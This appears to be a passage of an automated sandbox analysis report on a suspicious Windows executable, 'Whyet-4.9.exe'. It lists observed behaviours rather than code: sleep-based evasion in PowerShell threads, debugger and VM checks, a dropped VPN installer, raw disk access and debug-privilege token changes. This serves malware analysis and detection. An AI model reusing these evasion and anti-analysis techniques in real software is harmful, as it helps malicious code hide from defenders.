Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 681

Source: C:\ProgramData\Program\iusb3mon.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_32-35410

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Dropped PE file which has not been started: C:\Program Files\product1\letsvpn-latest.exe

Jump to dropped file

Source: C:\ProgramData\Program\iusb3mon.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_32-35372

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-3248

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

API coverage: 5.3 %

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe TID: 1992	Thread sleep time: -105000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148	Thread sleep count: 4196 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200	Thread sleep count: 1723 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4292	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5636	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 5668	Thread sleep count: 38 > 30
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 5668	Thread sleep time: -38000s >= -30000s
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 7124	Thread sleep count: 1626 > 30
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 1440	Thread sleep count: 32 > 30
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 1440	Thread sleep time: -96000s >= -30000s
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 1440	Thread sleep count: 574 > 30
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 1440	Thread sleep time: -1722000s >= -30000s
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 5668	Thread sleep count: 110 > 30
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe TID: 5668	Thread sleep time: -110000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836	Thread sleep count: 1183 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6648	Thread sleep count: 1184 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1048	Thread sleep count: 877 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2604	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 7768	Thread sleep time: -82000s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 4180	Thread sleep time: -125700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 348	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4508	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep count: 4728 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 161 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep count: 4241 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep count: 1527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944	Thread sleep count: 2646 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 2810 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep count: 284 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984	Thread sleep count: 2923 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8008	Thread sleep count: 694 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep count: 4347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 80 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4400	Thread sleep count: 3297 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4400	Thread sleep count: 1648 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4148	Thread sleep count: 4424 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5940	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1776	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5060	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\Program\iusb3mon.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

Thread sleep count: Count: 1626 delay: -10

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D72E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

32_2_04D72E2C

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D772F5 GetSystemInfo,wsprintfA,

32_2_04D772F5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: irsetup.exe, 00000002.00000002.4545979900.00000000063CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.4099955630.000002BE30E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.4100801458.000002BE3645B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: irsetup.exe, 00000002.00000002.4545979900.0000000006391000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@-9
Source: irsetup.exe, 00000002.00000002.4545979900.0000000006391000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWons\AppData\Local\Temp\IRW139C.tmprshell.exe

Source: C:\Users\user\Desktop\Whyet-4.9.exe	API call chain: ExitProcess graph end node	graph_0-3249
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	API call chain: ExitProcess graph end node	graph_2-24789
Source: C:\ProgramData\Program\iusb3mon.exe	API call chain: ExitProcess graph end node	graph_32-35162

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Code function: 0_2_00007FF676FA3240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF676FA3240

Source: C:\Users\user\Desktop\Whyet-4.9.exe

0_2_00007FF676FA5D98

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_0058817A mov eax, dword ptr fs:[00000030h]	32_2_0058817A
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_0057DB1C mov ecx, dword ptr fs:[00000030h]	32_2_0057DB1C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D300CD mov eax, dword ptr fs:[00000030h]	32_2_04D300CD

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_000000018003A8E4 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,

2_2_000000018003A8E4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
